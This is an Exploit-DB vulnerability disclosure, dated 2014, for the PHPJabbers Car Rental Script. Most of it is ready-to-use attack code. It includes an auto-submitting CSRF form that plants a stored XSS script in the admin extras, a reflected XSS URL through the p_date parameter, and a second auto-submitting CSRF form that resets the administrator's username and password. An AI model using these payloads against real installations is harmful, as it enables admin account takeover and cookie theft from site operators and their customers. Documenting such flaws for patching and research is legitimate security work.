PHPJabbers Car Rental Script – Multiple Vulnerabilities

  • 作者: HackXBack
    日期: 2014-01-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/30912/
  • Car Rental Script - Multiple Vulnerabilities
    ====================================================================
    
    ####################################################################
    .:. Author : HackXBack
    .:. Contact: h-b@usa.com
    .:. Home : http://www.iphobos.com/blog/
    .:. Script : http://www.phpjabbers.com/car-rental/
    ####################################################################
    
    ===[ Exploit ]===
    
    [1] Multiple Cross Site Scripting
    =================================
    
    I. Persistent XSS
    
    # CSRF with XSS Exploit:
    
    
    <html>
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="
    http://SITE/index.php?controller=AdminExtras&action=create">
    <input type="hidden" name="extra_create" value="1"/>
    <input type="hidden" name="i18n[1][name]"
    value="<script>alert(document.cookie);</script>"/>
    <input type="hidden" name="i18n[2][name]" value=""/>
    <input type="hidden" name="i18n[3][name]" value=""/>
    <input type="hidden" name="price" value="1000$"/>
    <input type="hidden" name="per" value="booking"/>
    <input type="hidden" name="count" value="1000$"/>
    </form>
    </body>
    </html>
    
    
    II. Non-Persistent XSS
    
    www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS
    
    www.site.com/index.php?controller=AdminBookings&action=index&p_date=
    "><script>alert(document.cookie);</script>"/>
    
    
    
    [2] Cross Site Request Forgery
    ===============================
    
    [Change Username/Password Admin]
    
    <html>
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="
    http://site/index.php?controller=AdminOptions&action=update">
    <input type="hidden" name="options_update" value="1"/>
    <input type="hidden" name="tab" value="1"/>
    <input type="hidden" name="username" value="admin"/>
    <input type="hidden" name="password" value="password"/>
    <input type="hidden" name="value-enum-currency" value="USD|GBP|EUR::USD"/>
    <input type="hidden" name="value-enum-date_format"
    value="d.m.Y|m.d.Y|Y.m.d|j.n.Y|n.j.Y|Y.n.j|d/m/Y|m/d/Y|Y/m/d|j/n/Y|n/j/Y|Y/n/j|d-m-Y|m-d-Y|Y-m-d|j-n-Y|n-j-Y|Y-n-j::j/n/Y"/>
    <input type="hidden" name="value-enum-datetime_format" value="d.m.Y,
    H:i|d.m.Y, H:i:s|m.d.Y, H:i|m.d.Y, H:i:s|Y.m.d, H:i|Y.m.d, H:i:s|j.n.Y,
    H:i|j.n.Y, H:i:s|n.j.Y, H:i|n.j.Y, H:i:s|Y.n.j, H:i|Y.n.j, H:i:s|d/m/Y,
    H:i|d/m/Y, H:i:s|m/d/Y, H:i|m/d/Y, H:i:s|Y/m/d, H:i|Y/m/d, H:i:s|j/n/Y,
    H:i|j/n/Y, H:i:s|n/j/Y, H:i|n/j/Y, H:i:s|Y/n/j, H:i|Y/n/j, H:i:s|d-m-Y,
    H:i|d-m-Y, H:i:s|m-d-Y, H:i|m-d-Y, H:i:s|Y-m-d, H:i|Y-m-d, H:i:s|j-n-Y,
    H:i|j-n-Y, H:i:s|n-j-Y, H:i|n-j-Y, H:i:s|Y-n-j, H:i|Y-n-j, H:i:s::j/n/Y,
    H:i"/>
    <input type="hidden" name="value-enum-timezone"
    value="-43200|-39600|-36000|-32400|-28800|-25200|-21600|-18000|-14400|-10800|-7200|-3600|0|3600|7200|10800|14400|18000|21600|25200|28800|32400|36000|39600|43200|46800::0"/>
    </form>
    
    </body>
    </html>
    ####################################################################